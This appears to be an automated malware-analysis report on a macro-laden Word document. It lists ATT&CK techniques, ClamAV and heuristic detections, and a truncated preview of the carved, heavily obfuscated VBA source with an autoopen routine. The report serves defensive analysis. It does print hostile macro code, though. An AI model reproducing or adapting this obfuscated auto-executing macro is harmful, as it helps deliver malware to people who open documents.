MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' specifically points to the GetObject function being used for execution. While the VBA code is heavily obfuscated, the presence of an AutoOpen macro and the GetObject call strongly suggest the intent to download and execute a secondary payload, a common technique for malware delivery.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6895675-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6895675-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65643 bytes | fc7d5eda4e084a14b5b51b92915417e1f769053ec83cda106f7e18d4592e0347 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "z1QAAQo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AQDxAAk()
If ocD1A4D = HUQZAX Then
NA1oxBA = 554361585 * GAAAxGQ
qU1wUUB = dD_AAAA - 698792739 + 777590765 + GAAACCQA * 507726365 / 374737812 + 103588121 / Chr(982838085 / CSng(591533824 + Round(JCXBXA))) + 418807935 * Log(rXDxADAo) - 24348915 - 438463101 + h_1QXDA * CLng(FoC1A1Q - Atn(fUAQcA / 578844023 / 498215604 + CwCAZC))
uAcDZAQ = 722019255 * lcDAUUB
End If
If LkxAAAG = UQ4AQAAx Then
WcUAwUw = 780657462 * sxBDxA
V1cABGw = Y_A4UAoC - 670880181 + 524188913 + aBCBZxUc * 235166917 / 410551870 + 993926928 / Chr(22542776 / CSng(96875843 + Round(ZGUx4A))) + 631054947 * Log(J4_DGA) - 351019788 - 272742505 + vUAXAABU * CLng(ZoZAAU - Atn(aUcoAA / 389975616 / 898885015 + QAAUDA))
XZDDQAD = 724085957 * FG11AD
End If
If cABBAB = mkBXABXk Then
LQ_GUx = 874156968 * iAQXCU
vBoQQDx = HwkGQ4Z - 788307726 + 298554501 + uBQGAAAC * 971143405 / 914287193 + 630225764 / Chr(480501242 / CSng(360006485 + Round(cDDUAA))) + 776415041 * Log(iwQkAAUA) - 887634697 - 164369999 + BXAAGDA * CLng(mQ_AAUA - Atn(TkQAxwD / 291086681 / 632989598 + w4X_CQA))
oAoAUA_A = 878366526 * zAQQAQUA
End If
If aDQXAUAc = wGxAGBC Then
hXQBAAAX = 344067677 * pQZ4XA
d4A_wA1 = lcDQBC - 380085407 + 481250729 + YA1ZD1A * 799517496 / 435024678 + 162162368 / Chr(424219047 / CSng(848476640 + Round(XAwBA1AA))) + 166038451 * Log(SDwC4kk) - 233134722 - 532067592 + ODAXAx * CLng(ooDUAAA - Atn(h_AkDxUC / 566286129 / 842010666 + P4DQwQ))
coAX4A = 603680362 * wAB4D4AA
End If
If PAAAQUD = DDxAcB_ Then
BUBAwUDA = 587402444 * HGwQAQ
iQxBAGA = MQxkAZDZ - 778105293 + 559422389 + YAkAAUUo * 244553452 / 485098912 + 426228522 / Chr(772469458 / CSng(41835702 + Round(BBQACkA))) + 563580181 * Log(IwAB1QcC) - 567742778 - 189010872 + VkAoU_AD * CLng(jADAcZ - Atn(qXAQQXAA / 960135499 / 937535998 + YDBkAGQA))
qCGDBc = 480703898 * YQoDBBo
End If
If MXADAc = bQUAGXAA Then
TQAkQUAQ = 602512026 * hDxAAAo
ZUADDB = O1ADUXG - 42467324 + 343980876 + kUUD_4o * 172335936 / 685351924 + 88152729 / Chr(539136019 / CSng(391764818 + Round(pUcCGAwB))) + 117722851 * Log(lcwADQ) - 802540459 - 689018974 + PDxDZZ * CLng(XAAwB4A - Atn(jDXkBo / 64953299 / 724179701 + AAAAUCG))
zBAABk = 670779861 * ZA4DGGk
End If
If fUG1www = dwwBcA Then
tQQA_Q = 70485112 * pQAAAwUB
TADQAXAk = mBZGBAA - 102711376 + 439453356 + i1QAUA * 861157225 / 823544849 + 16558329 / Chr(829631648 / CSng(4023308 + Round(KZQcooBA))) + 958392019 * Log(wxDUAX1k) - 357163569 - 770779506 + cDAAA1D * CLng(RZ_DQAXB - Atn(hQ4_UX_U / 843000277 / 538101657 + LACwAc))
IoAXAQ4 = 60882598 * EBADAA
End If
If aDAkwDQG = HAwcGZAA Then
PDDCxA = 939608818 * S44CUQA
jADcQA = X4ADA41X - 474074119 + 434197554 + FZAQDX * 204697818 / 526509723 + 798356989 / Chr(799444247 / CSng(204955026 + Round(J_ADA1UB))) + 145956775 * Log(wAUxAAC) - 355587503 - 905117198 + KZQABA * CLng(hUAQ_A - Atn(HkA1cX / 64478473 / 619793349 + JXABBk1))
qBAUAA = 88181653 * uAwoD4Qw
End If
End Function
Sub autoopen()
On Error Resume Next
If ocU4oGA_ = jkAAAC Then
UAADc4A = 708727178 * KCD_AAQ
nU4UoA = RoAkAGcG - 833435535 + 478957882 + noAkAA * 946852564 / 30364420 + 204085401 / Chr(785819855 / CSng(368662687 + Round(wDUAAB))) + 945141700 * Log(UBAUUAkA) - 500977260 - 319738619 + MAB_Q4 * CLng(ZBZcBAA - Atn(EA_AB_AX / 496449479 / 890617177 + V1A1wG_A))
w_XABACB = 484198909 * uUUo4UAw
End If
If QADBUA1 = tXQ_QAZD Then
BCkGUX = 602933488 * OAwGx1o
oADCcDX = q4BBAAAc - 416540413 + 188126701 + UAQQU4AZ * 518963508 / 162618353 + 902154686 / Chr(696889504 / CSng(125610511 + Round(ADCQZ
... (truncated)
```